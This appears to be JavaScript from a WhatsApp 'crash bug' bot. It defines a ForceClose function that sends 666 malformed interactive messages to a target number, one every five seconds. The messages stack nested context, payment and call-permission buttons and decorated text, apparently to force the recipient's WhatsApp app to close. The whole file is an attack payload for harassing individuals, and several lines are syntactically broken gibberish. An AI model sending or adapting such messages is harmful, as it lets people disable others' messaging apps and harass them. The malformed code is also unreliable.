const ConnectionFuntionNames = require("FunctionNames");
let FuntiomNames("ForceClose");

async function ForceClose(target) {
for (let r = 0; r < 666; r++) {  
  let msg = await generateWAMessageFromContent(
    target,
    {
      viewOnceMessage: {
        message: {
          interactiveMessage: {
          contextInfo: {
            participant: "0@s.whatsapp.net",
            remoteJid: "X",
            mentionedJid: [target],
            forwardedNewsletterMessageInfo: {
              newsletterName: "ð—§ð—›ð—˜ ð—”ð—Ÿð—ªð—”ð—¬ð—¦ ð—–ð—¥ð—”ð—¦ð—› ð—©ðŸ² ð—šð—˜ð—¡ ðŸ¯",
              newsletterJid: "120363401172007536@newsletter",
              serverMessageId: 1
            },
            externalAdReply: {
              showAdAttribution: true,
              title: "ð—§ð—›ð—˜ ð—”ð—Ÿð—ªð—”ð—¬ð—¦ ð—–ð—¥ð—”ð—¦ð—› ð—©ðŸ² ð—šð—˜ð—¡ ðŸ¯",
              body: "",
              thumbnailUrl: null,
              sourceUrl: "https://tama.app/",
              mediaType: 1,
              renderLargerThumbnail: true
            },
            businessMessageForwardInfo: {
              businessOwnerJid: target,
            },
            dataSharingContext: {
              showMmDisclosure: true,
            },
            quotedMessage: {
              paymentInviteMessage: {
                serviceType: 1,
                expiryTimestamp: null
              }
            }
          },
            header: {
              title: "",
              hasMediaAttachment: false
            },
            body: {
              text: "ð”¨ð”¦ð”©ð”©ð”¢ð”¯ð”¥ð”¬ð”¯ð”°ð”¢ â†¯ ð”›ð” ð”¯ð”žð”°ð”¥",
            },
            nativeFlowMessage: {
              messageParamsJson: "{\"name\":\"galaxy_message\",\"title\":\"galaxy_message\",\"header\":\"Ryuichi - Beginner\",\"body\":\"Call Galaxy\"}",
              buttons: [
                {
                  name: "single_select",
                  buttonParamsJson: apiClient + "ð—§ð—›ð—˜ ð—”ð—Ÿð—ªð—”ð—¬ð—¦ ð—–ð—¥ð—”ð—¦ð—› ð—©ðŸ² ð—šð—˜ð—¡ ðŸ¯",
                },
                {
                  name: "call_permission_request",
                  buttonParamsJson: apiClient + "ð—§ð—›ð—˜ ð—”ð—Ÿð—ªð—”ð—¬ð—¦ ð—–ð—¥ð—”ð—¦ð—› ð—©ðŸ² ð—šð—˜ð—¡ ðŸ¯,
                }, 
                {
                  name: "payment_method",
                  buttonParamsJson: ""
                },
                {
                  name: "payment_status",
                  buttonParamsJson: ""
                },
                {
                  name: "review_order",
                  buttonParamsJson: ""
                },
              ],
            },
          },
        },
      },
    },
    {}
  );

  await ForceClose.relayMessage(target, msg.message, {
    participant: { jid: target },
    messageId: msg.key.id
  });
await sleep(5000)
console.log("success send force close whatsapp api")
}
}


await Remember Funtion Names
var KeyIdFunctionNames("ForceClose") 
